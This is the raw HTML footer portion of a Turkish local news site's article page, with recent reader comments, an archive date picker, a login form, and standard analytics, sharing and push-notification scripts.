<li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/belediye-personellerinden-elbistanspora-tam-destek-h64156.html#comment_268373" title="" >Mecburi olmasın yoksa. Birazda zenginler,yeşiller,...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/belediye-personellerinden-elbistanspora-tam-destek-h64156.html#comment_268372" title="" >Ne desteği çalışanlara sormadan herkesin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html#comment_268371" title="" >Önce kaldırımları işgal edenleri temizleyin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/arife-ulger-97-yasinda-h64166.html#comment_268370" title="" >Allah rahmet eylesin.Mekanı cennet olsun.Tüm...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-h64139.html#comment_268369" title="" >Dayı mekanın cennet olsun güzel insan</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/arife-ulger-97-yasinda-h64166.html#comment_268368" title="" >Allah rahmet eylesin, mekanı cennet olsun....</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-temiz-83-yasinda-h64137.html#comment_268367" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" selected>14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" selected>Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2019" selected>2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=116" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/2.jpg&w=160&h=248&q=90" width="160" height="248" style="width:160px;height: 248px;border:0" alt="banner116" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2019 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Uzman Dr. Erdinç Hatipsoylu, özel muayenehane açtı" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fuzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('64176', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 